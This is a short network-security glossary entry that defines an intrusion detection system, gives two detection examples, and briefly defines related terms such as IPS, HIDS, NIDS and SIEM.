Network Security
Intrusion Detection System (IDS)
Also known as: IDS
Definition
A passive security control that monitors network or host activity for malicious behaviour and raises alerts without blocking traffic.
Examples
- Suricata watching a SPAN port and alerting on a Log4Shell exploitation pattern.
- OSSEC on a Linux host detecting modifications to /etc/passwd and sending an alert to SIEM.
Related terms
Intrusion Prevention System (IPS)
An inline security control that detects malicious traffic and actively blocks, resets, or scrubs it in real time.
Host-Based IDS (HIDS)
An intrusion-detection agent installed on a server or endpoint that monitors local files, processes, logs, and system calls for malicious activity.
Network-Based IDS (NIDS)
An intrusion-detection sensor that inspects traffic captured from a network segment to identify malicious patterns and policy violations.
Signature-Based Detection
A detection method that compares observed traffic, files, or behaviour against a database of known-bad patterns (signatures) to flag malicious activity.
Anomaly-Based Detection
A detection approach that builds a baseline of normal activity and flags deviations from it as potentially malicious.
SIEM
A platform that aggregates, normalizes and correlates security telemetry from across the enterprise to enable detection, investigation, compliance and reporting.